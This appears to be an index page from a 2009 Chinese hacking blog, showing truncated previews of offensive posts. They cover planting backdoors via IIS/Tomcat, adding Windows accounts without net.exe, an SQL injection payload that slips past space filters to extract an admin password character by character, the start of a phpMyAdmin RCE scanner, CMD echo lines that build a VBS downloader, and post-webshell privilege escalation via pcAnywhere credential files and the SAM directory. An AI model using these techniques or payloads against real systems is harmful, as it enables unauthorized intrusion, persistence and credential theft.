教你如何用Iis留后门(图)

作者:admin 日期:2009-07-02

公司邮件服务器用的jsp+mysql，windows上必然要用到tomcat。然而tomcat安装以后在windows上默认是system权限，只要得到一个shell，服务器就搞定。所以在服务里面采取了降权的手法，让tomcat服务，以单独账户运行，防止webshell提权

想到tomcat权限如此之大，我们是否可以借鉴tomcat这种方式留系统后门呢？

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3

命令行下一种新的加帐号的方法

作者:admin 日期:2009-07-02

作者：lcx

今天研究了一下用户控制面板文件nusrmgr.cpl，发现调用的是Shell.Users来加用户，它还同时调用了 wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话，这一个 Shell.Users就足够了。那么可能在删掉了net.exe和不用adsi之外，这也可能是一种新的加用户的方法。代码如下：

js:

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3

利用“()”绕过空格继续注射

作者:admin 日期:2009-07-01

举个例子说一下，我们得到一个注入点：jmdcw.asp?name=aa'and 1=1 and ''='，如果替换其中的1=1为查询管理员的密码的语句：
(select asc(mid(pass,1,1)) from [name] where id=1)>49如何用空格呢？其实可以写成这样的：
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='
如果屏蔽了符号，则用between…and…，语句是：
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3

pmaPWN! - phpMyAdmin Code Injection RCE Scanner &

作者:admin 日期:2009-06-29

程序代码

<?php

$list = array(
'/phpmyadmin/',
'/phpMyAdmin/',

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 5

BHST文章系统漏洞

作者:admin 日期:2009-06-24

作者:Jshell
Blog:http://www.jshell.cn
发布于鸡拔毛IT潮人社区
http://www.jbmao.com
首先说下作者在程序中代码的顺序错误

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 8

CMD下执行VBS下载脚本

作者:admin 日期:2009-06-22

在CMD中一条一条地敲如下语句：
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >down.vbs
echo xPost.Open "GET","http://www.baidu.com/img/logo.gif",0 >>down.vbs
echo xPost.Send() >>down.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>down.vbs

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 9

提升(web)权限终极9技巧

作者:admin 日期:2009-06-16

当我们取得一个webshell时候，下一部要做的就是提升权限
个人总结如下：
1:   C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密码，登陆
2.C:\WINNT\system32\config\

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 14